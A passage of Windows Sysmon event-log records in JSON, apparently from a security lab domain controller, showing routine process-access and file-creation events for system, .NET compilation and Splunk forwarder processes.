SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7516,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.429\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.429","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7517,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.429\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2257-5F25-0000-0010D4BD0D00}\r\nTargetProcessId: 4288\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.429","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2257-5F25-0000-0010D4BD0D00}","TargetProcessId":"4288","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7518,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.507\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2257-5F25-0000-00103BC20D00}\r\nTargetProcessId: 3068\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.507","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2257-5F25-0000-00103BC20D00}","TargetProcessId":"3068","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7519,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.507\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2257-5F25-0000-00103BC20D00}\r\nTargetProcessId: 3068\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.507","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2257-5F25-0000-00103BC20D00}","TargetProcessId":"3068","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7520,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.507\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2257-5F25-0000-00103BC20D00}\r\nTargetProcessId: 3068\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.507","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2257-5F25-0000-00103BC20D00}","TargetProcessId":"3068","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7521,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.554\r\nSourceProcessGUID: {41C8662E-2257-5F25-0000-0010D4BD0D00}\r\nSourceProcessId: 4288\r\nSourceThreadId: 2452\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.554","SourceProcessGUID":"{41C8662E-2257-5F25-0000-0010D4BD0D00}","SourceProcessId":"4288","SourceThreadId":"2452","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7522,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:43.944\r\nProcessGuid: {41C8662E-2257-5F25-0000-00103BC20D00}\r\nProcessId: 3068\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\bfc-0\\PresentationFramework.Aero.dll\r\nCreationUtcTime: 2020-08-01 08:05:43.944","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:43.944","ProcessGuid":"{41C8662E-2257-5F25-0000-00103BC20D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\bfc-0\\PresentationFramework.Aero.dll","CreationUtcTime":"2020-08-01 08:05:43.944","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7523,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.976\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-001071690D00}\r\nTargetProcessId: 2992\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.976","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-001071690D00}","TargetProcessId":"2992","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7524,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.976\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2254-5F25-0000-001071690D00}\r\nTargetProcessId: 2992\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.976","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2254-5F25-0000-001071690D00}","TargetProcessId":"2992","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7525,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.991\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2257-5F25-0000-00108BC70D00}\r\nTargetProcessId: 2992\r\nTargetImage: 